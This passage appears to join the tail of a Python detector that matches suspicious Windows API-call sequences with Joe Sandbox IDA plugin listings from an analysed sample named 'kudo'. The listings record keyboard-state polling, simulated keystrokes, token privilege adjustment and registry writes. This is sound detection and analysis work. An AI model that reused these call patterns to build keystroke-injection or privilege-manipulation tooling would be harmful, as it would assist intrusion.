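    hits: Dict[str, List[int]] = {}
    for name, steps in PATTERNS.items():
        m = match_sequence(calls, steps)
        if m is not None:
            hits[name] = m
    return hits


# Abridged copy of the foreground-window entry above (repeated key events dropped).
FOREGROUND_LISTING = """\
• GetForegroundWindow.USER32 ref: 008048DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083D665
• SetForegroundWindow.USER32(?), ref: 0083D685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083D69B
• GetCurrentThreadId.KERNEL32 ref: 0083D6A2
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6BF
• SetForegroundWindow.USER32(?), ref: 0083D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6E7
• keybd_event.USER32(00000012,00000000), ref: 0083D6F2
• keybd_event.USER32(00000012,00000000), ref: 0083D71E
• SetForegroundWindow.USER32(?), ref: 0083D721
• AttachThreadInput.USER32(?,?,00000000), ref: 0083D748
"""
# Full copy of the token / window-station entry above.
DESKTOP_LISTING = """\
•   Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
•   Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
•   Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
• _memset.LIBCMT ref: 00858353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008583A5
• CloseHandle.KERNEL32(?), ref: 008583B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008583CD
• GetProcessWindowStation.USER32 ref: 008583E6
• SetProcessWindowStation.USER32(00000000), ref: 008583F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0085840A
•   Part of subcall function 008581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
•   Part of subcall function 008581CB: CloseHandle.KERNEL32(?), ref: 008581F2
"""
# Control input: the file-time formatting entry, which should match nothing.
BENIGN_LISTING = """\
• FindFirstFileW.KERNEL32(?,?), ref: 0086C78D
• FindClose.KERNEL32(00000000), ref: 0086C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C806
• __swprintf.LIBCMT ref: 0086C890
"""

if __name__ == "__main__":
    for label, text in (("foreground", FOREGROUND_LISTING), ("desktop", DESKTOP_LISTING), ("benign", BENIGN_LISTING)):
        print(label, {k: [f"{a:08X}" for a in v] for k, v in scan(text).items()})
```

The matcher is deliberately an ordered subsequence, not a contiguous one, because these listings interleave helper calls (MapVirtualKeyW, CloseHandle, the LIBCMT routines) between the calls that carry the meaning; argument checks are kept to literals the listing actually shows, since "?" marks values the plugin could not resolve.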
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C78D
                                                      • FindClose.KERNEL32(00000000), ref: 0086C7E1
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C806
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C81D
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0086C844
                                                      • __swprintf.LIBCMT ref: 0086C890
                                                      • __swprintf.LIBCMT ref: 0086C8D3
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • __swprintf.LIBCMT ref: 0086C927
                                                        • Part of subcall function 00823698: __woutput_l.LIBCMT ref: 008236F1
                                                      • __swprintf.LIBCMT ref: 0086C975
                                                        • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 00823713
                                                        • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 0082372B
                                                      • __swprintf.LIBCMT ref: 0086C9C4
                                                      • __swprintf.LIBCMT ref: 0086CA13
                                                      • __swprintf.LIBCMT ref: 0086CA62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: e18a8791fd459f027bcdd92c72a01235922b0ef3c9df2c22f150b3d176123533
                                                      • Instruction ID: 00a2ac69239b42dc872c72d9a85298d1d4850a0ea27d9c7bbd162a5c58667a24
                                                      • Opcode Fuzzy Hash: e18a8791fd459f027bcdd92c72a01235922b0ef3c9df2c22f150b3d176123533
                                                      • Instruction Fuzzy Hash: 88A11DB1404204ABC750EFA8DC85DAFB7ECFF95704F404929F595C6292EA34DA48CB63
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0086EFB6
                                                      • _wcscmp.LIBCMT ref: 0086EFCB
                                                      • _wcscmp.LIBCMT ref: 0086EFE2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0086EFF4
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0086F00E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F026
                                                      • FindClose.KERNEL32(00000000), ref: 0086F031
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F04D
                                                      • _wcscmp.LIBCMT ref: 0086F074
                                                      • _wcscmp.LIBCMT ref: 0086F08B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F09D
                                                      • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F0BB
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F0C5
                                                      • FindClose.KERNEL32(00000000), ref: 0086F0D2
                                                      • FindClose.KERNEL32(00000000), ref: 0086F0E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                      • Instruction ID: 3aceb367db35c16d629cb426b26cf7c8594733e78c90c8385ee8abb6807656c2
                                                      • Opcode Fuzzy Hash: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                      • Instruction Fuzzy Hash: 3131B4325016196BDB14EFA8EC49AEE77ACFF48360F110175EA14D2192DB74DA84CF62
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880953
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0088F910,00000000,?,00000000,?,?), ref: 008809C1
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00880A09
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00880A92
                                                      • RegCloseKey.ADVAPI32(?), ref: 00880DB2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880DBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 1e9002d600dd867376fbb5498012260269de126e505b3cb04cc7fdb08ba4d071
                                                      • Instruction ID: 15543e56107c4846c8abd3001786493afa5a1741ffc115ea4b1fbafeaff7c662
                                                      • Opcode Fuzzy Hash: 1e9002d600dd867376fbb5498012260269de126e505b3cb04cc7fdb08ba4d071
                                                      • Instruction Fuzzy Hash: 620238756046119FCB54EF28D841E2AB7E5FF89314F048568F99ADB3A2DB30EC45CB82
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 0088C627
                                                        • Part of subcall function 0088AB37: ClientToScreen.USER32(?,?), ref: 0088AB60
                                                        • Part of subcall function 0088AB37: GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                        • Part of subcall function 0088AB37: PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C690
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0088C69B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0088C6BE
                                                      • _wcscat.LIBCMT ref: 0088C6EE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0088C705
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C71E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C735
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C757
                                                      • DragFinish.SHELL32(?), ref: 0088C75E
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0088C851
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 2166380349-3440237614
                                                      • Opcode ID: bf8e4c4daf46cb7ae38b8445b7d5de8455bf279ac29052ee56d721f65f654f54
                                                      • Instruction ID: 98ee8ffa1e80363d811b4eaf5a4114556deac2829383b18b23ce05847c3b4191
                                                      • Opcode Fuzzy Hash: bf8e4c4daf46cb7ae38b8445b7d5de8455bf279ac29052ee56d721f65f654f54
                                                      • Instruction Fuzzy Hash: 0B614D71108305AFC701EF68DC85D9BBBE8FF99710F10092EF695D22A1DB70A949CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0086F113
                                                      • _wcscmp.LIBCMT ref: 0086F128
                                                      • _wcscmp.LIBCMT ref: 0086F13F
                                                        • Part of subcall function 00864385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008643A0
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F16E
                                                      • FindClose.KERNEL32(00000000), ref: 0086F179
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F195
                                                      • _wcscmp.LIBCMT ref: 0086F1BC
                                                      • _wcscmp.LIBCMT ref: 0086F1D3
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F1E5
                                                      • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F203
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F20D
                                                      • FindClose.KERNEL32(00000000), ref: 0086F21A
                                                      • FindClose.KERNEL32(00000000), ref: 0086F22C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                      • Instruction ID: 060170e47717cf857d68dd7f7f94653b2d0edaec6660e6a92e160fac44e0401e
                                                      • Opcode Fuzzy Hash: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                      • Instruction Fuzzy Hash: 1C31C436500219AADB20AF68FC59EEE77ACFF45360F110171FA14E2292DB34DA85CF64
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0086A20F
                                                      • __swprintf.LIBCMT ref: 0086A231
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0086A26E
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0086A293
                                                      • _memset.LIBCMT ref: 0086A2B2
                                                      • _wcsncpy.LIBCMT ref: 0086A2EE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0086A323
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086A32E
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0086A337
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086A341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                      • Instruction ID: 6d16317e10483618c65df60ac73b902cf940ad030d701f8bc750f1f4ecda4075
                                                      • Opcode Fuzzy Hash: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                      • Instruction Fuzzy Hash: 0231B2B5500119ABDB21DFA4DC49FEB77BCFF88701F1040B6F608E2261EB7096848B25
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0088C1FC
                                                      • GetFocus.USER32 ref: 0088C20C
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0088C217
                                                      • _memset.LIBCMT ref: 0088C342
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0088C36D
                                                      • GetMenuItemCount.USER32(?), ref: 0088C38D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0088C3A0
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0088C3D4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0088C41C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0088C454
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0088C489
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 3616455698-4108050209
                                                      • Opcode ID: cdbde6f9eb47777f08d082bd56641fe0c4a91c1424147ae42344350b837f9106
                                                      • Instruction ID: 0356e01dd7b9210e479059e5ed2290877b53723e97e8b922bb7b11ab3731bcd8
                                                      • Opcode Fuzzy Hash: cdbde6f9eb47777f08d082bd56641fe0c4a91c1424147ae42344350b837f9106
                                                      • Instruction Fuzzy Hash: 08816D70208311AFDB20EF18D894A7BBBE4FB88714F00492EFA95D7295D770D945CB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                      • Instruction ID: 445978c7de024f28289768b66f3da7dd69dc504fe5491a863a5db402879e9b75
                                                      • Opcode Fuzzy Hash: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                      • Instruction Fuzzy Hash: 08727D75E00219DBDF24CF58C8947EEB7B5FF48315F14816AE949EB280EB349A85CB90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860097
                                                      • SetKeyboardState.USER32(?), ref: 00860102
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00860122
                                                      • GetKeyState.USER32(000000A0), ref: 00860139
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00860168
                                                      • GetKeyState.USER32(000000A1), ref: 00860179
                                                      • GetAsyncKeyState.USER32(00000011), ref: 008601A5
                                                      • GetKeyState.USER32(00000011), ref: 008601B3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 008601DC
                                                      • GetKeyState.USER32(00000012), ref: 008601EA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860213
                                                      • GetKeyState.USER32(0000005B), ref: 00860221
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                      • Instruction ID: cda3ddec7eb214e7ad85368380abb2c126bc272e96f79a26d0420fdfbca11fd9
                                                      • Opcode Fuzzy Hash: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                      • Instruction Fuzzy Hash: 9D51ED2090478829FB35D76489147EBBFB4FF12380F094599D5C29A1C3DAA49B8CCF66
                                                      APIs
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008804AC
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0088054B
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008805E3
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00880822
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088082F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: ab152bf6911a4b9f7b72245c787a7681e72995dc68e91af77aa7f62ad6f20e7e
                                                      • Instruction ID: 2b8905b69b0dcb28ad91e4c36456f3a3047061a4dad75784f7a7212f8634105d
                                                      • Opcode Fuzzy Hash: ab152bf6911a4b9f7b72245c787a7681e72995dc68e91af77aa7f62ad6f20e7e
                                                      • Instruction Fuzzy Hash: 21E15F71604214AFCB54EF28C891D2ABBE4FF89314B04856DF949D72A2D731E945CF52
                                                      APIs
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                      • Instruction ID: c9a48f12cbb0f6fe96f7938bf648445666cb2034f02c5eadf49cc5d6718afd08
